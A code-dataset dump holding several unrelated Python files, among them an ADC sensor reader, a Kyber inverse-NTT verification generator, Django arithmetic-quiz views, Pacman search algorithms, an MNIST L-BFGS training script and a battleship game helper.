index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
11,000 | 47f88573281b6f3658499f600a9ca12b6a277423 | """
ADDR => GND => I2C ADDRESS = 0x48
From datasheet ADS1115 returns values from -32768 to 32767
Gain set as 1 measures up to 4.096 V
32767 / 4.096V = 7999.75
Therefore, we must divide reading by 7999.75 for voltage result
attopilot V ratio = 1 : 4.13
attopilot
"""
CONVERT = (4.096/32767)
vRatio = 4.13
ADDR = 0x48
GAIN = (1)
import smbus
from time import sleep
import Adafruit_ADS1x15
#Object for use
ADC = Adafruit_ADS1x15.ADS1115(address=ADDR, busnum=1)
bus = smbus.SMBus(1)
#Quick check for I2C connection
try:
bus.write_quick(ADDR)
except:
print("ERROR")
#Start continuous conversions on A0
#ADC.start_adc(0, gain=1)
if __name__ == '__main__':
while True:
try:
#READ SINGLE VOLTAGE ON A0
volt = (ADC.read_adc(0, GAIN) * CONVERT) * vRatio
except IOError:
volt = 0
try:
#READ SINGLE CURRENT ON A1
amps = (ADC.read_adc(1, GAIN) * CONVERT)
except IOError:
amps = 0
amp = volt/219.2
print("%.6f V\t" % volt, "%.6f\t" % amps, "%.6f A" % amp)
sleep(0.1)
|
11,001 | cd6d3215c5b935d57d7af1e09ed3cadee6edbb99 | #################################
# Basics
#################################
# return an LSB-first bit-vector
def int_to_bits (i, width) :
result = []
for j in range (width) :
result.append (i % 2)
i = i // 2
return result
# reverse a list
def reverse (l) :
return l[::-1]
# convert an LSB-first bit-vector to an int
def bits_to_int (bv) :
result = 0
for j in range (0, len(bv)) :
result += bv[j] * (2 ** j)
return result
def bits_reverse (i, width) :
return bits_to_int (reverse(int_to_bits(i, width)))
def memory (base, step, offset, postfix='') :
return "L0x{0:x}{1}".format(base + step * offset, postfix)
def argument (name, index) :
return "{0}{1:03d}".format(name, index)
#################################
#################################
# inverse NTT
#################################
q = 3329
R = 2**16
zeta = 17
inv_roots = [
# 1 layer
1701, 1807, 1460, 2371, 2338, 2333, 308, 108, 2851, 870,
854, 1510, 2535, 1278, 1530, 1185, 1659, 1187, 3109, 874,
1335, 2111, 136, 1215, 2945, 1465, 1285, 2007, 2719, 2726,
2232, 2512, 75, 156, 3000, 2911, 2980, 872, 2685, 1590,
2210, 602, 1846, 777, 147, 2170, 2551, 246, 1676, 1755,
460, 291, 235, 3152, 2742, 2907, 3224, 1779, 2458, 1251,
2486, 2774, 2899, 1103,
# 1st loop of 2 & 3 & 4 layers
1275, 2652, 1065, 2881, 1571, 205, 1861,
# 2nd loop of 2 & 3 & 4 layers
725, 1508, 2368, 398, 2918, 1542, 1474,
# 3rd loop of 2 & 3 & 4 layers
951, 247, 1421, 3222, 2721, 2597, 1202,
# 4th loop of 2 & 3 & 4 layers
2499, 271, 90, 853, 2312, 681, 2367,
# 5th loop of 2 & 3 & 4 layers
1860, 3203, 1162, 1618, 130, 1602, 3147,
# 6th loop of 2 & 3 & 4 layers
666, 320, 8, 2813, 1871, 829, 1752,
# 7th loop of 2 & 3 & 4 layers
1544, 282, 1838, 1293, 2946, 3065, 2707,
# 8th loop of 2 & 3 & 4 layers
2314, 552, 2677, 2106, 1325, 2756, 171,
# 5 & 6 & 7 layers
3127, 3042, 1907, 1836, 1517, 359, 1932,
# 128^-1 * 2^32
1441
]
coeff_base = 0x2001a530
root_base = 0x800e5d4
num_cuts = 0
def print_cut () :
global num_cuts
print ("cut (* {0} *)".format(num_cuts))
num_cuts = num_cuts + 1
def get_cut_num () :
return (num_cuts - 1)
def print_inputs () :
type = "sint16"
for i in range(0, 256, 4) :
print (" {0} {1}, {0} {2}, {0} {3}, {0} {4}{5}".
format(type, argument('f',i), argument('f',i+1),
argument('f',i+2), argument('f',i+3),
"," if i < 252 else ""))
def print_pre_range_condition () :
print (" (* range *)")
print (" and [")
for i in range (0, 256):
print (" (-{1})@16 <=s {0}, {0} <s {1}@16{2}".
format (argument('f',i), q, "," if i < 255 else ""))
print (" ]")
def print_pre_condition () :
print ("{")
print (" true")
print (" &&")
print_pre_range_condition ()
print ("}\n")
def print_params () :
print ("(* === params === *)\n")
print ("mov q {0}@sint16;".format(q))
print ("")
def init_srcs (mem_base) :
print ("(* src *)")
for i in range (0, 256, 2) :
print ("mov {0} {1}; mov {2} {3};".
format(memory(mem_base,2,i), argument('f',i),
memory(mem_base,2,i+1), argument('f',i+1)))
print ("")
def init_roots (mem_base) :
print ("(* inv_roots *)")
for i in range (0, len(inv_roots), 2) :
print ("mov {0} {1:4d}@sint16; mov {2} {3:4d}@sint16;".
format(memory(mem_base,2,i), inv_roots[i],
memory(mem_base,2,i+1), inv_roots[i+1]))
print ("")
def print_inp_polys (mem_base, step) :
print ("(* inp_polys *)")
num_rings = 128
num_coeffs = 256 // num_rings
for i in range (num_rings, 2 * num_rings) :
ring_base = num_coeffs * (i - num_rings)
print ("ghost inp_poly_{0}@bit :".format(i-num_rings))
print (" inp_poly_{0} * inp_poly_{0} = ".format(i-num_rings))
# print (" inp_poly_{0} = ".format(i-num_rings))
for j in range (ring_base, ring_base + num_coeffs, 2) :
print (" {0} * (x**{1}) + {2} * (x**{3}){4}".
format (memory(mem_base,step,j), j-ring_base,
memory(mem_base,step,j+1), j+1-ring_base,
" + " if j < ring_base + num_coeffs - 2 else ""))
print (" && true;\n")
def print_imm_polys (mem_base, step) :
print("(* imm_polys *)")
num_rings = 8
num_coeffs = 256 // num_rings
for i in range (num_rings, 2 * num_rings) :
ring_base = num_coeffs * (i - num_rings)
print("ghost imm_poly_{0}@bit :".format(i-num_rings))
print(" imm_poly_{0} * imm_poly_{0} = ".format(i-num_rings))
# print(" imm_poly_{0} = ".format(i-num_rings))
for j in range (ring_base, ring_base + num_coeffs, 2) :
print(" {0} * (x**{1}) + {2} * (x**{3}){4}".
format (memory(mem_base,step,j), j-ring_base,
memory(mem_base,step,j+1), j+1-ring_base,
" + " if j < ring_base + num_coeffs - 2 else ""))
print(" && true;\n")
def print_inits () :
print ("(* === inits === *)\n")
init_srcs (coeff_base)
init_roots (root_base)
print ("(* regs *)")
print ("nondet r0@uint32;")
print ("")
print_inp_polys (coeff_base, 2)
def print_mid_algebraic_condition (stage, mem_base, step, factor,
end='', mem_postfix='') :
inp_num_rings = 128
inp_num_coeffs = 256 // inp_num_rings
num_rings = 2 ** (7 - stage)
num_coeffs = 256 // num_rings
for i in range (inp_num_rings, 2 * inp_num_rings) :
modulo = (zeta ** bits_reverse(i, 8)) % q
ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
print (" (* inp_poly_{0} *)".format(i-inp_num_rings))
print (" eqmod {1} * (inp_poly_{0} * inp_poly_{0})".
# print (" eqmod {1} * (inp_poly_{0})".
format(i-inp_num_rings, factor))
print (" (")
for j in range (ring_base, ring_base + num_coeffs) :
if (j - ring_base) % 2 == 0 : print (" ", end = '')
print ("{0} * (x**{1}){2}".
format (memory(mem_base,step,j,mem_postfix), j-ring_base,
" + " if j < ring_base + num_coeffs - 1 else ""),
end = '')
if (j - ring_base) % 2 == 1 : print ("")
print (" )")
print (" [{0}, x**{1} - {2}]{3}".
format (q, inp_num_coeffs, modulo,
',' if i < 2 * inp_num_rings - 1 else end))
def print_mid_algebraic_condition_slice (stage, mem_base, step, factor,
num_slice, ith_slice,
end='', mem_postfix='') :
inp_num_rings = 128
inp_num_coeffs = 256 // inp_num_rings
rings_per_slice = inp_num_rings // num_slice
num_rings = 2 ** (7 - stage)
num_coeffs = 256 // num_rings
for i in range (inp_num_rings + ith_slice * rings_per_slice,
inp_num_rings + (ith_slice + 1) * rings_per_slice) :
modulo = (zeta ** bits_reverse(i, 8)) % q
ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
print (" (* inp_poly_{0} *)".format(i-inp_num_rings))
print (" eqmod {1} * (inp_poly_{0} * inp_poly_{0})".
# print (" eqmod {1} * (inp_poly_{0})".
format(i-inp_num_rings, factor))
print (" (")
for j in range (ring_base, ring_base + num_coeffs) :
if (j - ring_base) % 2 == 0 : print (" ", end = '')
print ("{0} * (x**{1}){2}".
format (memory(mem_base,step,j,mem_postfix), j-ring_base,
" + " if j < ring_base + num_coeffs - 1 else ""),
end = '')
if (j - ring_base) % 2 == 1 : print ("")
print (" )")
print (" [{0}, x**{1} - {2}]{3}".
format (q, inp_num_coeffs, modulo,
',' if i < inp_num_rings + (ith_slice + 1)
* rings_per_slice - 1 else end))
def print_range_condition (mem_base, step, factor, end='', mem_postfix=''):
for i in range (0, 256):
print (" {0}@16 * (-{1})@16 <=s {2}, {2} <s {0}@16 * {1}@16{3}".
format (factor, q,
memory(mem_base,step,i,mem_postfix),
"," if i < 255 else end))
def print_backward_algebraic_condition (stage, mem_base, step, factor,
end='', mem_postfix='') :
inp_num_rings = 8
inp_num_coeffs = 256 // inp_num_rings
num_rings = 2 ** (7 - stage)
num_coeffs = 256 // num_rings
for i in range (inp_num_rings, 2 * inp_num_rings) :
modulo = (zeta ** bits_reverse(i, 8)) % q
ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
print (" (* imm_poly_{0} *)".format(i-inp_num_rings))
print (" eqmod (2**16) * (imm_poly_{0} * imm_poly_{0})".
# print (" eqmod (2**16) * (imm_poly_{0})".
format(i-inp_num_rings))
print (" {0} * (".format(factor))
for j in range (ring_base, ring_base + num_coeffs) :
if (j - ring_base) % 2 == 0 : print (" ", end = '')
print ("{0} * (x**{1}){2}".
format (memory(mem_base,step,j,mem_postfix), j-ring_base,
" + " if j < ring_base + num_coeffs - 1 else ""),
end = '')
if (j - ring_base) % 2 == 1 : print ("")
print (" )")
print (" [{0}, x**{1} - {2}]{3}".
format (q, inp_num_coeffs, modulo,
',' if i < 2 * inp_num_rings - 1 else end))
def print_backward_algebraic_condition_slice (stage, mem_base, step, factor,
num_slice, ith_slice,
end='', mem_postfix='') :
inp_num_rings = 8
inp_num_coeffs = 256 // inp_num_rings
rings_per_slice = inp_num_rings // num_slice
num_rings = 2 ** (7 - stage)
num_coeffs = 256 // num_rings
for i in range (inp_num_rings + ith_slice * rings_per_slice,
inp_num_rings + (ith_slice + 1) * rings_per_slice) :
modulo = (zeta ** bits_reverse(i, 8)) % q
ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
print (" (* imm_poly_{0} *)".format(i-inp_num_rings))
print (" eqmod (2**16) * (imm_poly_{0} * imm_poly_{0})".
# print (" eqmod (2**16) * (imm_poly_{0})".
format(i-inp_num_rings))
print (" {0} * (".format(factor))
for j in range (ring_base, ring_base + num_coeffs) :
if (j - ring_base) % 2 == 0 : print (" ", end = '')
print ("{0} * (x**{1}){2}".
format (memory(mem_base,step,j,mem_postfix), j-ring_base,
" + " if j < ring_base + num_coeffs - 1 else ""),
end = '')
if (j - ring_base) % 2 == 1 : print ("")
print (" )")
print (" [{0}, x**{1} - {2}]{3}".
format (q, inp_num_coeffs, modulo,
',' if i < inp_num_rings + (ith_slice + 1) *
rings_per_slice - 1 else end))
print ("proc main (")
print (" sint16 x,")
print_inputs ()
print (") =\n")
print_pre_condition ()
print_params ()
print_inits ()
print ("(* === layer 1 === *)")
print_cut ()
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (1, coeff_base, 2, factor=2)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
print ("(* === layer 2+3+4 === *)")
print_cut ()
cut_234_all = get_cut_num()
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (4, coeff_base, 2, factor=16)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
### split the algebraic conditions into 8 slices
cut_234_slices = []
for i in range (0, 8) :
print_cut ()
print (" true && true;\n")
print ("(* slice {0} *)".format(i))
print_cut ()
cut_234_slices.append (get_cut_num())
print (" and [")
print_mid_algebraic_condition_slice (4, coeff_base, 2, factor=16,
num_slice=8, ith_slice=i)
print (" ] prove with [cuts [{0}]]".format(cut_234_all))
print (" &&")
print (" true")
print (";\n")
### be ready for next layer
print_cut ()
print (" true")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ] prove with [cuts [{0}]]".format(cut_234_all))
print (";\n")
print_imm_polys (coeff_base, 2)
print ("(* === layer 5+6+7 === *)")
print_cut ()
cut_567_all = get_cut_num()
print (" (* algebraic *)")
print (" and [")
print_backward_algebraic_condition (7, coeff_base, 2, factor=16)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
### split the algebraic conditions into 8 slices
cut_567_slices = []
for i in range (0, 8) :
print_cut ()
print (" true && true;\n")
print ("(* slice {0} *)".format(i))
print_cut ()
cut_567_slices.append (get_cut_num())
print (" and [")
print_backward_algebraic_condition_slice (7, coeff_base, 2, factor=16,
num_slice=8, ith_slice=i)
print (" ] prove with [cuts [{0}]]".format(cut_567_all))
print (" &&")
print (" true")
print (";\n")
### prove the post condition separately in 8 cuts
print ("(* === prove post condition separately === *)")
cut_post_slices = [];
for i in range (0, 8) :
print_cut ()
print (" true && true;\n")
print ("(* slice {0} *)".format(i))
print_cut ()
cut_post_slices.append (get_cut_num())
print (" and [")
print_mid_algebraic_condition_slice (7, coeff_base, 2, factor=(2**16),
num_slice=8, ith_slice=i)
print (" ] prove with [cuts [{0}, {1}], all ghosts]".
format(cut_234_slices[i], cut_567_slices[i]))
print (" &&")
print (" true")
print (";\n")
print_cut ()
print (" true && true;\n")
print ("(* === post condition === *)")
print ("{")
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (7, coeff_base, 2, factor=(2**16))
print (" ] prove with [cuts [", end='')
for i in range(0, 8) :
print ("{0}{1}".format(cut_post_slices[i], ',' if i < 7 else ''), end='')
print ("]]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ] prove with [cuts [{0}]]".format(cut_567_all))
print ("}\n")
|
11,002 | 09c497b5000cde554dadecd5c9df43574711d92d | from django.urls import path
from . import views
app_name = 'campus'
urlpatterns = [
path('', views.index, name='index'),
path('learn/<learning_code>', views.learning_view, name='learning'),
path('learn/<learning_code>/<unit_slug>', views.lesson_view, name='lesson'),
]
|
11,003 | 1dc8332b8320adcdf92b6825c508ad4a3aacf9f6 | from django.shortcuts import render
from random import randint
# Create your views here.
def home(request):
return render(request, 'home.html', {})
def add(request):
num_1 = randint(0, 10)
num_2 = randint(0, 10)
if request.method == "POST":
answer = request.POST['answer']
old_num_1 = request.POST['old_num_1']
old_num_2 = request.POST['old_num_2']
# Error Handling if no input field
if not answer:
my_answer = "Please provide an input to the field."
color = 'danger'
return render(request, 'add.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color,
})
correct_answer = int(old_num_1) + int(old_num_2)
if int(answer) == correct_answer:
my_answer = "Correct! " + old_num_1 + " + " + old_num_2 + " = " + answer
color = "info"
else:
my_answer = "Incorrect! " + old_num_1 + " + " + old_num_2 + " is not " + answer + ". Correct answer is " + str(
correct_answer)
color = "danger"
return render(request, 'add.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color, })
return render(request, 'add.html', {
'num_1': num_1,
'num_2': num_2,
})
def subtract(request):
num_1 = randint(0, 10)
num_2 = randint(0, 10)
if request.method == "POST":
answer = request.POST['answer']
old_num_1 = request.POST['old_num_1']
old_num_2 = request.POST['old_num_2']
# Error Handling if no input field
if not answer:
my_answer = "Please provide an input to the field."
color = 'danger'
return render(request, 'subtract.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color,
})
correct_answer = int(old_num_1) - int(old_num_2)
if int(answer) == correct_answer:
my_answer = "Correct! " + old_num_1 + " - " + old_num_2 + " = " + answer
color = "info"
else:
my_answer = "Incorrect! " + old_num_1 + " - " + old_num_2 + " is not " + answer + ". Correct answer is " + str(
correct_answer)
color = "danger"
return render(request, 'subtract.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color, })
return render(request, 'subtract.html', {
'num_1': num_1,
'num_2': num_2,
})
def multiply(request):
num_1 = randint(0, 10)
num_2 = randint(0, 10)
if request.method == "POST":
answer = request.POST['answer']
old_num_1 = request.POST['old_num_1']
old_num_2 = request.POST['old_num_2']
# Error Handling if no input field
if not answer:
my_answer = "Please provide an input to the field."
color = 'danger'
return render(request, 'multiply.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color,
})
correct_answer = int(old_num_1) * int(old_num_2)
if int(answer) == correct_answer:
my_answer = "Correct! " + old_num_1 + " x " + old_num_2 + " = " + answer
color = "info"
else:
my_answer = "Incorrect! " + old_num_1 + " x " + old_num_2 + " is not " + answer + ". Correct answer is " + str(
correct_answer)
color = "danger"
return render(request, 'multiply.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color, })
return render(request, 'multiply.html', {
'num_1': num_1,
'num_2': num_2,
})
def divide(request):
num_1 = randint(0, 10)
num_2 = randint(1, 10)
if request.method == "POST":
answer = request.POST['answer']
old_num_1 = request.POST['old_num_1']
old_num_2 = request.POST['old_num_2']
# Error Handling if no input field
if not answer:
my_answer = "Please provide an input to the field."
color = 'danger'
return render(request, 'divide.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color,
})
correct_answer = int(old_num_1) / int(old_num_2)
if float(answer) == correct_answer:
my_answer = "Correct! " + old_num_1 + " / " + old_num_2 + " = " + answer
color = "info"
else:
my_answer = "Incorrect! " + old_num_1 + " / " + old_num_2 + " is not " + answer + ". Correct answer is " + str(
correct_answer)
color = "danger"
return render(request, 'divide.html', {
'answer': answer,
'my_answer': my_answer,
'num_1': num_1,
'num_2': num_2,
'color': color, })
return render(request, 'divide.html', {
'num_1': num_1,
'num_2': num_2,
})
|
11,004 | d61b8657cb6bc1439d20fd7543c668e90a6cdae0 | from itertools import combinations
import json
from yaniv_rl import utils
from yaniv_rl.game.card import YanivCard
suits = YanivCard.suits
ranks = YanivCard.ranks
deck = utils.init_deck()
handcombos = combinations(deck, 5)
scores = {s: [] for s in range(51)}
for hand in handcombos:
score = utils.get_hand_score(hand)
scores[score].append(utils.cards_to_str(hand))
with open("scores.json", "w") as f:
json.dump(scores, f, indent=4) |
11,005 | 15e5897bab6d96635b80f682cabb7894d80f35ff | import time
from sys import path
from os import getcwd
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
from mpi4py import MPI
p = getcwd()[0:getcwd().rfind("/")]+"/Logger"
path.append(p)
import Logger
logfile = Logger.DataLogger("MNIST_LBFGS","Epoch,time,train_accuaracy,test_accuaracy,train_cost,test_cost")
p = getcwd()[0:getcwd().rfind("/")]+"/lbfgs"
path.append(p)
from lbfgs_optimizer import lbfgs_optimizer
from Opserver import Opserver
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
# Parameters
learning_rate = 0.001
training_epochs = 100
batch_size = 100
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # MNIST data input (img shape: 28*28)
n_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
# Create model
def multilayer_perceptron(x, weights, biases):
# Hidden layer with RELU activation
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.relu(layer_1)
# Hidden layer with RELU activation
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.relu(layer_2)
# Output layer with linear activation
out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
return out_layer
# Store layers weight & bias
weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
# Construct model
pred = multilayer_perceptron(x, weights, biases)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))
# Initializing the variables
init = tf.initialize_all_variables()
correct_prediction = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Launch the graph
config = tf.ConfigProto(device_count={"CPU": 1, "GPU": 0},
inter_op_parallelism_threads=1,
intra_op_parallelism_threads=1)
sess=tf.Session(config=config)
sess.run(init)
tx,ty = mnist.train.images[0:30],mnist.train.labels[0:30]
train_size = len(tx)
bsize=train_size
if rank==0:
trainer=lbfgs_optimizer(0.0001, cost,[],sess,1,comm,size,rank)
for b in range(5):
data_x=tx[bsize*b:bsize*(b+1)]
data_y=ty[bsize*b:bsize*(b+1)]
trainer.update(data_x,data_y,x,y)
start=time.time()
for i in range(40):
c = trainer.minimize()
train=sess.run(accuracy,{x:tx,y:ty})
test= sess.run(accuracy,{x:mnist.test.images,y:mnist.test.labels})
train_cost=c
test_cost= sess.run(cost,{x:mnist.test.images,y:mnist.test.labels})
#f=trainer.functionEval
#g=trainer.gradientEval
#i=trainer.innerEval
#print i, f, g, train, test,train_cost,test_cost
logfile.writeData((i,time.time()-start, train, test,train_cost,test_cost))
else:
opServer=Opserver(0.0001, cost,[],sess,comm,size,rank,0,x,y,keep_prob=0.0)
opServer.run()
|
11,006 | e2290eeeceea4b5085a50148b1231e36fe03b59a | """
Given two sequences, find the length of longest subsequence present in both of them.
A subsequence is a sequence that appears in the same relative order, but not necessarily contiguous.
For example, “abc”, “abg”, “bdf”, “aeg”, ‘”acefg”, .. etc are subsequences of “abcdefg”. So a string of
length n has 2^n different possible subsequences.
"""
memo = {}
def LCS(A, B):
if (A, B) in memo:
return memo[(A, B)]
else:
if len(A) == 0 or len(B) == 0:
return 0
if A[-1] == B[-1]:
memo[(A, B)] = LCS(A[:-1], B[:-1]) + 1
else:
memo[(A, B)] = max(LCS(A, B[:-1]), LCS(A[:-1], B))
return memo[(A, B)]
if __name__ == "__main__":
import unittest
class Test(unittest.TestCase):
def test1(self):
self.assertEqual(LCS("", ""), 0)
def test2(self):
self.assertEqual(LCS("ABCDEFG", "ACTEFSG"), 5)
unittest.main()
|
11,007 | be1e3de0a9a2b3d3059b0f6707cc4bbed4b2482c | import torch
import scipy.ndimage as nd
def get_device():
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
return device
def one_hot_embedding(labels, num_classes=10):
# Convert to One Hot Encoding
y = torch.eye(num_classes)
return y[labels]
def rotate_img(x, deg):
return nd.rotate(x.reshape(28, 28), deg, reshape=False).ravel()
|
11,008 | fc671e9e25a7dc16fcb1eb15b25394d21361c8d5 | # search.py
# ---------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
import heapq
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s,s,w,s,w,w,s,w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first [p 85].
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm [Fig. 3.7].
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
#Initializing variables
fringe = util.Stack()
#Creating visited list
visited = []
#Pushing start state to Stack
fringe.push((problem.getStartState(), []))
#Adding start state to visited list
visited.append(problem.getStartState())
#Popping point from the stack
while fringe.isEmpty() == False:
state, actions = fringe.pop()
#Getting successor nodes
for next in problem.getSuccessors(state):
newstate = next[0]
newdirection = next[1]
#Pushing successor nodes to the stack and appending to visited
if newstate not in visited:
if problem.isGoalState(newstate):
return actions + [newdirection]
else:
fringe.push((newstate, actions + [newdirection]))
visited.append(newstate)
util.raiseNotDefined()
def breadthFirstSearch(problem):
#Initializing variables
fringe = util.Queue()
#Creating visited list
visited = []
#Pushing start state to Stack
fringe.push((problem.getStartState(), []))
#Adding start state to visited list
visited.append(problem.getStartState())
#Popping point from the queue
while fringe.isEmpty() == False:
state, actions = fringe.pop()
#Getting successor nodes
for next in problem.getSuccessors(state):
newstate = next[0]
newdirection = next[1]
#Pushing successor nodes to the queue and appending to visited
if newstate not in visited:
if problem.isGoalState(newstate):
return actions + [newdirection]
else:
fringe.push((newstate, actions + [newdirection]))
visited.append(newstate)
util.raiseNotDefined()
def uniformCostSearch(problem):
"Search the node of least total cost first. "
#Update function to find node of least cost
def update(fringe, item, priority):
for index, (p, c, i) in enumerate(fringe.heap):
if i[0] == item[0]:
if p <= priority:
break
del fringe.heap[index]
fringe.heap.append((priority, c, item))
heapq.heapify(fringe.heap)
break
else:
fringe.push(item, priority)
#Initialize variables
fringe = util.PriorityQueue()
#Creating visited list
visited = []
fringe.push((problem.getStartState(), []), 0)
visited.append(problem.getStartState())
#Popping node from fringe
while fringe.isEmpty() == False:
state, actions = fringe.pop()
if problem.isGoalState(state):
return actions
#Adding current node to visited list
if state not in visited:
visited.append(state)
#Getting successors and finding the one of least cost using update function
for next in problem.getSuccessors(state):
newstate = next[0]
newdirection = next[1]
if newstate not in visited:
update(fringe, (newstate, actions + [newdirection]), problem.getCostOfActions(actions+[newdirection]))
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"Search the node that has the lowest combined cost and heuristic first."
visited = []
fringe = util.PriorityQueue()
start = problem.getStartState()
fringe.push((start, list()), heuristic(start, problem))
while not fringe.isEmpty():
state, actions = fringe.pop()
if problem.isGoalState(state):
return actions
visited.append(state)
for state, dir, cost in problem.getSuccessors(state):
if state not in visited:
newactions = actions + [dir]
score = problem.getCostOfActions(newactions) + heuristic(state, problem)
fringe.push( (state, newactions), score)
return []
util.raiseNotDefined()
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch |
11,009 | e3dea107d03de7bdf72fc32963bae2a3bb0b3dc0 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 8 13:31:03 2020
@author: chris
"""
from random import randint
def hint(l,r,c, aArray):
try:
if aArray[l][r-1][c] == "S":
return "(above)"
if aArray[l][r+1][c] == "S":
return "(below)"
if aArray[l][r][c+1] == "S":
return "(right)"
if aArray[l][r][c-1] == "S":
return "(left)"
else:
return "No ships in radius"
except IndexError:
return "No ships in radius"
def coord():
row = randint(0, 9)
column = randint(0,9)
level = randint(0,2)
return level, row, column
def collision(level,row,column,size,aArray,opt):
#ensures ship will fit on plane
column1=column
while column+(size-1) > 9:
column = randint(0,9)
if column > 9:
column = column1
clear = True
if opt == 0:
for i in range(size-1):
if aArray[level][row][column] == "S":
clear = False
else:
column+=1
if opt == 1:
#ensures ship will fit on plane
row1=row
while row+(size-1) > 9:
row = randint(0,9)
if row > 9:
row = row1
for i in range(size-1):
if aArray[level][row][column] == "S":
clear = False
else:
row+=1
if opt == 2:
#ensures ship will fit on plane
column1=column
row1=row
while column+(size-1) > 9 or row+(size-1) > 9:
column = randint(0,9)
row = randint(0,9)
if column > 9 or row > 9:
column = column1
row = row1
for i in range(size-1):
if aArray[level][row][column] == "S":
clear = False
else:
row+=1
column+=1
return clear, level, row, column, opt
def aRow(level,row,column,size,aArray):
#ensures ship will fit on plane
row1=row
while row+(size-1) > 9:
row = randint(0,9)
if row > 9:
row = row1
#creates ship
for i in range(size):
aArray[level][row][column]="S"
row+=1
return aArray
def aColumn(level,row,column,size,aArray):
#ensures ship will fit on plane
column1=column
while column+(size-1) > 9:
column = randint(0,9)
if column > 9:
column = column1
#creates ship
for i in range(size):
aArray[level][row][column]="S"
column+=1
return aArray
def aDiagnal(level,row,column,size,aArray):
#ensures ship will fit on plane
column1=column
row1=row
while column+(size-1) > 9 or row+(size-1) > 9:
column = randint(0,9)
row = randint(0,9)
if column > 9 or row > 9:
column = column1
row = row1
#creates ship
for i in range(size):
aArray[level][row][column]="S"
column+=1
row+=1
return aArray
